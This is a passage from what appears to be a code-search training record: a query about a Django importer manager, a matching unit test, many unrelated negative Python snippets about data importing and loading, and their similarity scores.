else str(field)\n for field in self._order_by\n ])", "def order_by(self, list_or_name):\n if not isinstance(list_or_name, basestring):\n for c in list_or_name:\n self.order_by(c)\n else:\n self._orderby_conds.append(list_or_name)\n\n return self" ]
[ "0.7341014", "0.7114981", "0.65821075", "0.6384245", "0.6316189", "0.6254384", "0.6160399", "0.60926193", "0.59577346", "0.59503293", "0.59400135", "0.5909272", "0.5759706", "0.57583076", "0.57493776", "0.5726326", "0.5716653", "0.571355", "0.5712792", "0.5647503", "0.5642596", "0.5628735", "0.56165737", "0.55814326", "0.55741805", "0.55557436", "0.5532448", "0.5529606", "0.5519835", "0.5511644", "0.5485929", "0.5465671", "0.54204506", "0.5419675", "0.54087925", "0.5402096", "0.5371906", "0.53660154", "0.53618526", "0.5359104", "0.5352894", "0.5334281", "0.5329987", "0.5329112", "0.5325092", "0.53136086", "0.5311685", "0.5303327", "0.5302453", "0.52917993", "0.52610624", "0.52568024", "0.52540207", "0.52511346", "0.522411", "0.52015024", "0.51937896", "0.5186127", "0.51592165", "0.5133022", "0.5132554", "0.510349", "0.50978875", "0.509699", "0.5087841", "0.5079201", "0.5072474", "0.5072194", "0.5070364", "0.5067101", "0.5014353", "0.5012664", "0.50006074", "0.49766332", "0.49702168", "0.49586567", "0.495488", "0.49414554", "0.49271742", "0.49263468", "0.49259594", "0.49211022", "0.49133986", "0.48979747", "0.48888963", "0.48784864", "0.48675054", "0.48620343", "0.48601866", "0.4846724", "0.48267564", "0.48263326", "0.48251227", "0.48155618", "0.48122683", "0.4795051", "0.47769246", "0.47763884", "0.47747236", "0.4774328" ]
0.6805322
2
Given an object without a dependency, use its importerManager to get available data
def test_nondependent_object_get(self): manager = ImporterManager(importer=UserImporter()) for row,name in enumerate(self.usernames): manager.update_kvs(field_name='username',value=name,row=row) manager.get_available_rows() for i in range(self.n_objs): objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany self.assertEqual(objs[0].available, True) self.assertIsNotNone(objs[0].object) self.assertIsInstance(objs[0].object, User) self.assertIsNotNone(objs[0].query) del manager
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def importer():\n pass", "def get_objects_data(self):\n pass", "def import_(self, data):\n return self.__import(data)", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def object_import(request, simulation, object_name):\n try:\n if object_name == 'function':\n parent = simulation.scenario.supply.functionset\n else:\n parent = simulation.scenario.supply.network\n query = get_query(object_name, simulation)\n user_id_set = set(query.values_list('user_id', flat=True))\n if object_name == 'link':\n # To import links, we retrieve the user ids of all centroids, crossings\n # and functions and we build mappings between ids and objects.\n centroids = get_query('centroid', simulation)\n centroid_ids = set(centroids.values_list('user_id', flat=True))\n crossings = get_query('crossing', simulation)\n crossing_ids = set(crossings.values_list('user_id', flat=True))\n node_ids = centroid_ids.union(crossing_ids)\n # Mapping between the user id and the id of the nodes.\n node_mapping = dict()\n for centroid in centroids:\n node_mapping[centroid.user_id] = centroid.id\n for crossing in crossings:\n node_mapping[crossing.user_id] = crossing.id\n functions = get_query('function', simulation)\n function_ids = set(functions.values_list('user_id', flat=True))\n # Mapping between the user id and the id of the functions.\n function_id_mapping = dict()\n # Mapping between the user id and the instance of the functions\n function_mapping = dict()\n for function in functions:\n function_id_mapping[function.user_id] = function.id\n function_mapping[function.user_id] = function\n # Convert imported file to a csv DictReader.\n encoded_file = request.FILES['import_file']\n tsv_file = StringIO(encoded_file.read().decode())\n reader = csv.DictReader(tsv_file, delimiter='\\t')\n to_be_updated = set()\n to_be_created = list()\n # Store the user_id of the imported instance to avoid two instances\n # with the same id.\n imported_ids = set()\n if object_name == 'centroid':\n # Do not import centroid with same id as a crossing.\n crossings = get_query('crossing', simulation)\n imported_ids = set(crossings.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Centroid(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'crossing':\n # Do not import crossing with same id as a centroid.\n centroids = get_query('centroid', simulation)\n imported_ids = set(centroids.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Crossing(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'function':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], row['expression'])\n )\n else:\n to_be_created.append(\n Function(user_id=id, name=row['name'],\n expression=row['expression'])\n )\n elif object_name == 'link':\n for row in reader:\n id = 
int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'],\n node_mapping[int(row['origin'])],\n node_mapping[int(row['destination'])],\n function_id_mapping[int(row['function'])],\n float(row['lanes']), float(row['length']),\n float(row['speed']), float(row['capacity']))\n )\n else:\n if int(row['origin']) in node_ids \\\n and int(row['destination']) in node_ids \\\n and int(row['function']) in function_ids:\n # Ignore the links with unidentified origin,\n # destination or function.\n to_be_created.append(\n Link(user_id=id, name=row['name'],\n origin=node_mapping[int(row['origin'])],\n destination=node_mapping[int(row['destination'])],\n vdf=function_mapping[int(row['function'])],\n lanes=float(row['lanes']),\n length=float(row['length']),\n speed=float(row['speed']),\n capacity=float(row['capacity']))\n )\n if to_be_updated:\n if object_name in ('centroid', 'crossing'):\n values = set(query.values_list('user_id', 'name', 'x', 'y'))\n elif object_name == 'function':\n values = set(query.values_list('user_id', 'name', 'expression'))\n elif object_name == 'link':\n values = set(query.values_list('user_id', 'name', 'origin',\n 'destination', 'vdf_id', 'lanes',\n 'length', 'speed', 'capacity'))\n # Find the instances that really need to be updated (the values have\n # changed).\n to_be_updated = to_be_updated.difference(values)\n if object_name in ('centroid', 'crossing', 'function'):\n # Update the objects (it would be faster to delete and re-create\n # them but this would require to also change the foreign keys of\n # the links).\n for values in to_be_updated:\n # Index 0 of values is the id column i.e. the user_id.\n instance = query.filter(user_id=values[0])\n if object_name in ('centroid', 'crossing'):\n instance.update(name=values[1], x=values[2], y=values[3])\n else: # Function\n instance.update(name=values[1], expression=values[2])\n elif object_name == 'link':\n # Delete the links and re-create them.\n ids = list(query.values_list('id', 'user_id'))\n # Create a mapping between the user ids and the ids.\n id_mapping = dict()\n for i in range(len(values)):\n id_mapping[ids[i][1]] = ids[i][0]\n # Retrieve the ids of the links to be updated with the mapping and\n # delete them.\n to_be_updated_ids = [id_mapping[values[0]]\n for values in to_be_updated]\n with connection.cursor() as cursor:\n chunk_size = 20000\n chunks = [\n to_be_updated_ids[x:x + chunk_size]\n for x in range(0, len(to_be_updated_ids), chunk_size)\n ]\n for chunk in chunks:\n # Delete the relations first.\n cursor.execute(\n \"DELETE FROM Network_Link \"\n \"WHERE link_id IN %s;\",\n [chunk]\n )\n cursor.execute(\n \"DELETE FROM Link \"\n \"WHERE id IN %s;\",\n [chunk]\n )\n # Create a mapping between the id and the instance of the\n # functions.\n function_mapping = dict()\n for function in functions:\n function_mapping[function.id] = function\n # Now, create the updated instances with the new values.\n to_be_created += [\n Link(user_id=values[0], name=values[1], origin=values[2],\n destination=values[3], vdf=function_mapping[values[4]],\n lanes=values[5], length=values[6], speed=values[7],\n capacity=values[8])\n for values in to_be_updated\n ]\n # Create the new objects in bulk.\n # The chunk size is limited by the MySQL engine (timeout if it is too big).\n chunk_size = 10000\n chunks = [to_be_created[x:x + chunk_size]\n for x in range(0, len(to_be_created), chunk_size)]\n # Remove the orphan instances.\n if object_name == 'function':\n 
query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all()) \\\n .delete()\n else:\n query.model.objects.exclude(network__in=Network.objects.all()).delete()\n for chunk in chunks:\n # Create the new instances.\n query.model.objects.bulk_create(chunk, chunk_size)\n # Retrieve the newly created instances and add the many-to-many\n # relation.\n # Add the many-to-many relation.\n if object_name == 'function':\n new_instances = query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all())\n for instance in new_instances:\n instance.functionset.add(parent)\n else:\n new_instances = query.model.objects \\\n .exclude(network__in=Network.objects.all())\n for instance in new_instances:\n instance.network.add(parent)\n simulation.has_changed = True\n simulation.save()\n return HttpResponseRedirect(\n reverse('metro:object_list', args=(simulation.id, object_name,))\n )\n except Exception as e:\n print(e)\n context = {\n 'simulation': simulation,\n 'object': object_name,\n }\n return render(request, 'metro_app/import_error.html', context)", "def test_dependent_object_import(self):\n # Initialize Importers\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,name in enumerate(self.usernames):\n user_manager.update_kvs(field_name='username', value=name, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row in range(self.n_objs):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n #: Test corresponding UserProfile has been returned\n for row in range(self.n_objs):\n objs = up_manager.get_objs_and_meta(row) #: Returns a list of objects only if manytomany, o/w just 1\n\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, UserProfile)\n self.assertIsNotNone(objs[0].query)\n\n self.assertEqual(objs[0].object.user.username, self.usernames[row])", "def test_twice_dependent_object_import(self):\n pass", "def load_data(self):", "def _load_objects(self):\n self._get_package()\n\n object_names = [name for name in dir(self._sdk) if name != \"GATDLSession\" and name != \"SDKInfo\" and name.startswith(\"GA\") and not name.endswith(\"Fetcher\")]\n\n for object_name in object_names:\n obj = getattr(self._sdk, object_name)\n self._objects_mapping[obj.rest_name] = object_name", "def import_from(self, importer=None):\n if not importer:\n raise aspecd.exceptions.MissingImporterError(\"No importer provided\")\n importer.import_into(self)\n self._origdata = copy.deepcopy(self.data)", "def _load(self):\n raise NotImplementedError()", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def import_manager(path: str) -> Donald:\n manager: Donald = import_obj(path)\n return manager", "def _load_objects():\n global DataArray, DataFrame, Series, Index, ndarray\n ndarray = np.ndarray\n DataArray = getattr(sys.modules.get('xarray', None), 
'DataArray', ndarray)\n DataFrame = getattr(sys.modules.get('pandas', None), 'DataFrame', ndarray)\n Series = getattr(sys.modules.get('pandas', None), 'Series', ndarray)\n Index = getattr(sys.modules.get('pandas', None), 'Index', ndarray)", "def __init__(self, loader):\n self.loader = loader\n self.models = []", "def load_data(self) -> None:", "def GetDataAsObject(self):", "def load_data(self):\n raise NotImplementedError()", "def load(self):\n return", "def init_from_entity(self, entity):\r\n\r\n if entity.type.lower() == '1_static_mesh':\r\n return UnrealImporter(entity, StaticImportTaskStrategy(),\r\n AssetExecuteTaskStrategy())\r\n\r\n elif entity.type.lower() == '2_skeletal_mesh':\r\n return UnrealImporter(entity, SkeletalImportTaskStrategy(),\r\n AssetExecuteTaskStrategy())\r\n\r\n else:\r\n raise NotImplementedError('No implementation for the \"{}\" file type'.format(entity.type))", "def load(self):\n raise NotImplementedError", "def load(self):\n raise NotImplementedError", "def get_object(path='', obj=None):\n if not path:\n return obj\n path = path.split('.')\n if obj is None:\n obj = importlib.import_module(path[0])\n path = path[1:]\n for item in path:\n if isinstance(obj, types.ModuleType):\n submodule = '{}.{}'.format(_package(obj), item)\n try:\n obj = importlib.import_module(submodule)\n except Exception as import_error:\n try:\n obj = getattr(obj, item)\n except:\n # FIXME: I know I should probably merge the errors, but\n # it's easier just to throw the import error since\n # it's most probably the one user wants to see.\n # Create a new LoadingError and throw a combination\n # of the import error and attribute error.\n raise import_error\n else:\n obj = getattr(obj, item)\n return obj", "def load(self):\n\n raise NotImplementedError", "def load(self):\n raise NotImplementedError()", "def load(self):\n raise NotImplementedError()", "def __iter__(self) -> Iterator:\n return iter(self.get_data_loader())", "def import_object(self):\r\n try:\r\n msg = f\"[sphinxcontrib-matlabdomain] MatlabDocumenter.import_object {self.modname=}, {self.objpath=}, {self.fullname=}.\"\r\n logger.debug(msg)\r\n if len(self.objpath) > 1:\r\n lookup_name = \".\".join([self.modname, self.objpath[0]])\r\n lookup_name = lookup_name.lstrip(\".\")\r\n obj = entities_table[lookup_name]\r\n self.object = self.get_attr(obj, self.objpath[1])\r\n else:\r\n lookup_name = self.fullname.lstrip(\".\")\r\n self.object = entities_table[lookup_name]\r\n return True\r\n # this used to only catch SyntaxError, ImportError and AttributeError,\r\n # but importing modules with side effects can raise all kinds of errors\r\n except Exception:\r\n if self.objpath:\r\n errmsg = (\r\n \"[sphinxcontrib-matlabdomain] Failed to import %s %r from module %r\"\r\n % (self.objtype, \".\".join(self.objpath), self.modname)\r\n )\r\n else:\r\n errmsg = \"[sphinxcontrib-matlabdomain] Failed to import %s %r\" % (\r\n self.objtype,\r\n self.fullname,\r\n )\r\n errmsg += (\r\n \"; the following exception was raised:\\n%s\" % traceback.format_exc()\r\n )\r\n logger.warning(errmsg)\r\n self.env.note_reread()\r\n return False", "def load(self):", "def map_data(self, obj: object):\n pass", "def extra_object_files(self):", "def _setup_object(self) -> object:\n raise NotImplementedError", "def load_model(self) -> Any:", "def _fetch_data(self):\n pass", "def get_external_data(self, cr, uid, conn, external_referential_id, defaults=None, context=None):\n return self.mage_import_base(cr, uid, conn, external_referential_id, defaults, context)#TODO 
refactor mage_import_base calls to this interface", "def import_data_helper(self): \n if len(self.components) == 1:\n hapi.fetch(TableName = self.tablename, M = self.components[0][0], I = self.components[0][1], numin = self.min_x, numax = self.max_x)\n else: \n global_id = []\n for c in self.components:\n global_id.append(hapi.ISO[c][0])\n hapi.fetch_by_ids(TableName = self.tablename, iso_id_list = global_id, numin = self.min_x, numax = self.max_x)", "def process_import_resource(self, resource):\n return resource", "def import_object(name: str) -> Any:\n if name.count(\".\") == 0:\n return __import__(name)\n\n parts = name.split(\".\")\n obj = __import__(\".\".join(parts[:-1]), fromlist=[parts[-1]])\n try:\n return getattr(obj, parts[-1])\n except AttributeError:\n raise ImportError(\"No module named %s\" % parts[-1])", "def load(self, *args, **kwargs):\n pass", "def dataloader(self):\n return DataLoader", "def get_data():\n pass", "def _init_loaders(self):\n @self.loaders_wrapper(\"nx2nx\")\n def get_nx2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.nx2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n @self.loaders_wrapper(\"neo4j2nx\")\n def get_neo4j2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n\n @self.loaders_wrapper(\"neo4j2edgelist\")\n def get_neo4j2edgelist_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2edgelist_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )\n\n\n @self.loaders_wrapper(\"edgelist2neo4j\")\n def get_edgelist2neo4j_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.edgelist2neo4j_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )", "def import_info(self):\n return self.setup.import_info", "def load(self):\n return None", "def _get_data(self):\n raise NotImplementedError()", "def test_partial_twice_dependent_object_import(self):\n pass", "def import_result(self) -> ImportedResult:\n raw_data = self._read_data(self.path)\n processed_data = self._process_data(raw_data)\n return self._create_result(raw_data, processed_data)", "def get_additional_data(self, object, object_type):\n if self.cartographer_client:\n return self.get_cartographer_data(object)", "def get_data(self):\n pass", "def get_data(self):\n pass", "def load_data(self):\n super(MudderyObjectCreater, self).load_data()\n \n data = self.get_data_record()\n if not data:\n return\n \n # set common object's info\n self.obj_list = {}\n\n for obj in data.obj_list.split(\",\"):\n obj_key = \"\"\n number = 0\n arg = obj.split(\":\", 1)\n if len(arg) == 1:\n obj_key = arg[0]\n number = 1\n elif len(arg) >= 2:\n obj_key = arg[0]\n number = int(arg[1])\n\n self.obj_list[obj_key] = number", "def ReadObject(self, *args, **kwargs):\n pass", "def get_external(self, 
_module_name: str) -> \"ImportRecord\":\n return self", "def loader(self):\n return self._loader", "def test_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def preload(self):\n # load the objects\n for otype, fname in self.TYPE2NAME.items():\n if fname:\n path = os.path.join(self.anodir, fname + \".gz\")\n if os.path.isfile(path):\n with gzip.open(path, \"rt\") as handler:\n for line in handler:\n omap = json.loads(line)\n cls = self.TYPE2CLASS[otype]\n item = cls.from_map(omap, self)\n self.caches[otype][item.id] = item", "def load_data(ctx, klass=None):\n if klass:\n if klass and not klass.startswith(\"public_data.models\"):\n klass = f\"public_data.models.{klass}\"\n options = {\"class\": klass}\n connecter = ScalingoInterface(ctx.obj)\n connecter.manage_py(\"load_data\", **options)", "def get_data(self):\r\n pass", "def _read_data(self) -> MMD:\n\t\tif self.config.source_type == SourceType.LOCAL_FILE:\n\t\t\treturn self._read_files()\n\t\telif self.config.source_type == SourceType.HDFS:\n\t\t\treturn self._read_hdfs()\n\t\telif self.config.source_type == SourceType.NEO4J:\n\t\t\treturn self._read_neo4j(self.config.graph_db)\n\n\t\telse:\n\t\t\traise NotImplementedError(\"The source type {} has not been implemented yet.\".format(loader_config.source_type))", "def _load(self) -> dict:\n raise NotImplementedError()", "def LoadDefinition(cls, metadata_object):\n pass", "def import_single_object(self, content_object):\n ct = ContentType.objects.get_for_model(content_object)\n object_id = content_object.id\n return self.import_all_ci([ct], asset_id=object_id)", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in 
enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def load_item(self, location):\r\n assert isinstance(location, Location)\r\n json_data = self.module_data.get(location)\r\n if json_data is None:\r\n module = self.modulestore.get_item(location)\r\n if module is not None:\r\n # update our own cache after going to the DB to get cache miss\r\n self.module_data.update(module.runtime.module_data)\r\n return module\r\n else:\r\n # load the module and apply the inherited metadata\r\n try:\r\n category = json_data['location']['category']\r\n class_ = self.load_block_type(category)\r\n\r\n\r\n definition = json_data.get('definition', {})\r\n metadata = json_data.get('metadata', {})\r\n for old_name, new_name in getattr(class_, 'metadata_translations', {}).items():\r\n if old_name in metadata:\r\n metadata[new_name] = metadata[old_name]\r\n del metadata[old_name]\r\n\r\n children = [\r\n location.course_key.make_usage_key_from_deprecated_string(childloc)\r\n for childloc in definition.get('children', [])\r\n ]\r\n data = definition.get('data', {})\r\n if isinstance(data, basestring):\r\n data = {'data': data}\r\n mixed_class = self.mixologist.mix(class_)\r\n data = self._convert_reference_fields_to_keys(mixed_class, location.course_key, data)\r\n metadata = self._convert_reference_fields_to_keys(mixed_class, location.course_key, metadata)\r\n kvs = MongoKeyValueStore(\r\n data,\r\n children,\r\n metadata,\r\n )\r\n\r\n field_data = KvsFieldData(kvs)\r\n scope_ids = ScopeIds(None, category, location, location)\r\n module = self.construct_xblock_from_class(class_, scope_ids, field_data)\r\n if self.cached_metadata is not None:\r\n # parent container pointers don't differentiate between draft and non-draft\r\n # so when we do the lookup, we should do so with a non-draft location\r\n non_draft_loc = location.replace(revision=None)\r\n\r\n # Convert the serialized fields values in self.cached_metadata\r\n # to python values\r\n metadata_to_inherit = self.cached_metadata.get(non_draft_loc.to_deprecated_string(), {})\r\n inherit_metadata(module, metadata_to_inherit)\r\n # decache any computed pending field settings\r\n module.save()\r\n return module\r\n except:\r\n log.warning(\"Failed to load descriptor\", exc_info=True)\r\n return ErrorDescriptor.from_json(\r\n json_data,\r\n self,\r\n location,\r\n error_msg=exc_info_to_str(sys.exc_info())\r\n )", "def ImportFromMojom(self, import_name):\n import_file = self._graph.files[import_name]\n import_module = module.Module()\n self.PopulateModuleMetadata(import_module, import_file)\n\n import_item = {\n 'module_name': import_module.name,\n 'namespace': import_module.namespace,\n 'module': import_module,\n }\n return import_item", "def _import(self, datadict):\n self.GUID = datadict.get(\"GUID\", uuid.uuid1())\n self.FileName = datadict.get(\"FileName\", \"\")\n self.Name = datadict.get(\"Name\", \"\")\n self.Projects = datadict.get(\"Projects\", [])\n self.VSVersion = datadict.get(\"VSVersion\", None)", "def 
load_data():\n\n if global_deserializer is None:\n raise SystemExit('global de-serializer was not set')\n\n return global_deserializer(input())", "def load_objects(self, queue):\n pass", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def _load(self):\n\n # This can happen when the object is not loaded yet\n # Usually when __init__ calls super().__init__()\n # and OrderSource starts initializing the instance attributes\n if not hasattr(self, \"_data\"):\n return\n\n if self._data is None:\n try:\n self._data = self.storage.load(basket=self)\n except BasketCompatibilityError as error:\n msg = _(\"Basket loading failed: Incompatible basket (%s).\")\n messages.error(self.request, msg % error)\n self.storage.delete(basket=self)\n self._data = self.storage.load(basket=self)\n self.dirty = False\n self.uncache()\n return self._data", "def test_get_imports(self):\n pass", "async def load(self) -> None:\n pass", "def load_input(self, setup=None, **kwargs):\n if not isinstance(setup, ResultImportSetup):\n setup = ResultImportSetup(**kwargs)\n self.setup = setup", "def load_model(self):\n pass", "def load(self):\n for name, item in itertools.chain(\n self._cal_objs.items(),\n self._noise_objs.items()):\n logger.debug(\"load {}\".format(item))\n item.load()", "def get(self):\n return getattr(self, 'import_{type}'.format(type=self.type))()", "def _get_or_create_data_loader(\n cls, root: 'Any', model: 'Any', info: 'ResolveInfo', args: dict\n ) -> ModelLoader:\n context: 'Union[dict, object]' = info.context\n\n if isinstance(context, dict):\n try:\n data_loaders = context[cls.dataloaders_field]\n except KeyError:\n data_loaders = {}\n context[cls.dataloaders_field] = data_loaders\n\n else:\n data_loaders = getattr(context, cls.dataloaders_field, None)\n if data_loaders is None:\n data_loaders = {}\n setattr(info.context, cls.dataloaders_field, data_loaders)\n\n # Unique dataloader key for context.\n data_loader_key = tuple((p for p in info.path if isinstance(p, str)))\n\n try:\n current_data_loader: ModelLoader = data_loaders[data_loader_key]\n except KeyError:\n current_data_loader = ModelLoader(type(root), model, info, args)\n data_loaders[data_loader_key] = current_data_loader\n\n return current_data_loader", "def manage_importObject(self, file, REQUEST=None, set_owner=1,\n suppress_events=False):\n dirname, file = os.path.split(file)\n if dirname:\n raise BadRequest('Invalid file name %s' % html.escape(file, True))\n\n for impath in self._getImportPaths():\n filepath = os.path.join(impath, 'import', file)\n if os.path.exists(filepath):\n break\n else:\n raise BadRequest(\n 'File does not exist: %s' %\n html.escape(\n file, True))\n\n imported = self._importObjectFromFile(\n filepath, verify=bool(REQUEST), set_owner=set_owner,\n suppress_events=suppress_events)\n getId = getattr(aq_base(imported), \"getId\", None) # aq wrapped\n id = imported.getId() if getId is not None else imported.id\n if getattr(id, '__func__', None) is not None:\n id = id()\n\n if REQUEST is not None:\n return self.manage_main(\n self,\n REQUEST,\n manage_tabs_message='\"%s\" successfully imported' % id,\n title='Object imported',\n update_menu=1\n )", "def import_init(self, request):\n for channel in request.channels:\n self.sync_channel(channel)\n\n logging.info('[IMPORT Completed')\n\n importer = Importer()\n\n return importer", "def test_importObject(self):\n created = Time()\n\n obj1 = MemoryObject(hash=u'sha256',\n contentDigest=u'9aef0e119873bb0aab04e941d8f76daf21dedcd79e2024004766ee3b22ca9862',\n 
content=u'blahblah some data blahblah',\n created=created,\n contentType=u'application/octet-stream')\n obj2 = self.successResultOf(self.contentStore.importObject(obj1))\n self.assertEquals(obj1.objectId, obj2.objectId)\n self.assertEquals(obj1.created, obj2.created)\n self.assertEquals(obj1.contentType, obj2.contentType)\n self.assertEquals(\n self.successResultOf(obj1.getContent()),\n self.successResultOf(obj2.getContent()))", "def import_object(import_str, *args, **kwargs):\r\n return import_class(import_str)(*args, **kwargs)", "def __init__(self):\n if DynamicImporter._instance is not None:\n raise Exception(\"DynamicImporter instance already exists!\")\n DynamicImporter._instance = self\n\n current_path = Path(__file__).parent\n test_path = current_path / \"testdata\"\n files = test_path.rglob(\"*.py\")\n\n for file in files:\n\n if file.name in [\"__init__.py\", \"test_module.py\", \"test_registry.py\", \"connections.py\"]:\n continue\n\n name = file.stem\n module = import_module(f\"testdata.{name}\")\n class_title = f\"{name.title()}Test\"\n\n try:\n _class = getattr(module, class_title) # get the class\n self.class_list[class_title] = _class # add the class to the class list\n except AttributeError: # don't throw exceptions for files that don't have a test\n continue", "def load(self):\n self._really_load()", "def __init__(self):\n # Define class API\n self.api = API2()\n # Initialize a list of SAVED_OBJECTS (used in get_ancestors)\n self.SAVED_OBJECTS = []\n # Initialize the total number of objects\n self.total = 0\n # Load saved objects from file to continue the last execution\n self.load_saved_objects()", "def load(self, *args, **kwargs) -> Any:\n pass", "def load_data(self, read_shelf):\n if read_shelf:\n try:\n # Attempt reading pre-shelved objects first\n self.__read_shelf()\n except Exception as e:\n print(f'Exception while reading the data shelf ({e})')\n # Otherwise, read data from the the json files\n self.__read_json()\n else:\n self.__read_json()", "def get_external(self: _R, module_name: str) -> _R:\n return self\n # source = ImportString(module_name) + self._local_source\n # return ImportRecord(\n # source=source,\n # name=self.name,\n # alias=self.alias,\n # )", "def load_model_custom(file, object):\n return getattr(load_module(file), object)", "def _parse_import_data(self, data, import_fields, options):\n return self._parse_import_data_recursive(self.model_id.model, '', data, import_fields, options)", "def get_data(self):", "def fetch(self):\n pass", "def fetch(self):\n pass", "def load(cls, data):\n if isinstance(data, dict):\n print('>>> dict')\n else:\n print('>>> obj')\n # cls_fields = fields(cls)\n init()", "def get_data(self):\n \n with os.scandir(self.file_path) as collection_of_files:\n files_found = [file.name.split('.')[0] for file in collection_of_files \n if (file.name.split('.')[0].lower().strip() in self._data_requirements.required_file_names \n and file.name.endswith('.csv'))]\n\n self.check_missing_files(files_found)\n \n self._data = DictObjectView(self.read_in_files(files_found))", "def fetch_data(self):", "def __init__(self, pe_manager):\n self.PE = pe_manager.PE\n self.structures = self.PE.__structures__\n self.pe_manager = pe_manager\n self.import_entries = pe_manager.PE.DIRECTORY_ENTRY_IMPORT\n self.import_structures = pe_manager.get_import_structures()\n\n self._origin_import_section = None\n self._new_import_section = None\n\n self.count_of_additional_fn = 0\n self.count_of_additional_dll = 0", "def get_real_object(self):\n query_string = 
dedent(f\"\"\"\\\n import app.config.models_importer as models_importer\n\n class_ = models_importer.all_models['{self.ref_class}']\n \n class_.query.get({self.ref_id})\"\"\")\n\n return exec(query_string)" ]
